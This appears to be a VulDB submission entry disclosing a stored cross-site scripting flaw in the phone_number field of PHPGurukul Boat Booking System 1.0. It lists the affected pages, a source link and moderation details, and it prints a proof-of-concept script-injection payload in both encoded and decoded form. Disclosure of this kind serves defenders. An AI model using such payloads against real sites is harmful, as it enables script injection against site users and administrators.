Title | PHPGurukul Boat Booking System 1.0 Cross Site Scripting |
---|
Description | book-boat.php and /admin/all-booking.php is vulnerable to the tested XSS payload: %3cIMG%20%22%22%22%3e%3cSCRIPT%3ealert(%22XSS%22)%3c%2fSCRIPT%3e%22%3e. This string is encoded and when decoded, it attempts to inject a script into the webpage: <IMG """"><SCRIPT>alert("XSS")</SCRIPT>">
Application does not properly sanitize or validate the phone_number input, this script could be executed in the user's browser, leading to an XSS attack. |
---|
Source | ⚠️ https://github.com/jadu101/CVE/blob/main/phpgurukul_boat_booking_system_book_boat_xss.md |
---|
User | jadu101 (UID 70632) |
---|
Submission | 10/17/2024 05:23 AM (2 months ago) |
---|
Moderation | 10/18/2024 09:17 PM (2 days later) |
---|
Status | Accepted |
---|
VulDB Entry | 280941 [PHPGurukul Boat Booking System 1.0 Book a Boat Page book-boat.php?bid=1 phone_number cross site scripting] |
---|
Points | 20 |
---|